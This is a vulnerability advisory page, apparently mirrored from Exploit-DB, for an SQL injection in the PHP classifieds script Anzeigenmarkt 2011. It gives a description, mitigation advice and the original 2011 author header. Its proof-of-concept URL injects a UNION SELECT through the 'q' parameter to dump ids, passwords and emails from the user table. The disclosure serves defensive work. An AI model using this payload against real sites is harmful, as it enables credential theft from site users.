Anzeigenmarkt 2011 SQL Injection Vulnerability

vendor:

Anzeigenmarkt 2011

by:

Easy Laster

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Anzeigenmarkt 2011

Affected Version From: Anzeigenmarkt 2011

Affected Version To: Anzeigenmarkt 2011

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Anzeigenmarkt 2011 SQL Injection Vulnerability

Anzeigenmarkt 2011 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Developers should never construct SQL statements directly from user input. Instead, parameterized queries should be used. Additionally, developers should use an API that supports prepared statements.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Anzeigenmarkt 2011 SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 02.04.2011
+Script  : ANZEIGENMARKT 2011
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project.com
+Greetz to Team-Internet ,Underground Agents, websec-empire.to and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco.
  
---------------------------------------------------------------------------------------
                                                                                       
 ___ ___ ___ ___                         _ _           _____           _         _ 
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|          
  
  
----------------------------------------------------------------------------------------
#Proof of Concept

www.site.com/anzeigenmarkt2011/index.php?d=list&q='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,
45,46,47,48,49,50,51,52,53,concat(id,0x3a,pass,0x3a,email),55,56,57,58,59,6+from+markt_u
ser--+&kat=10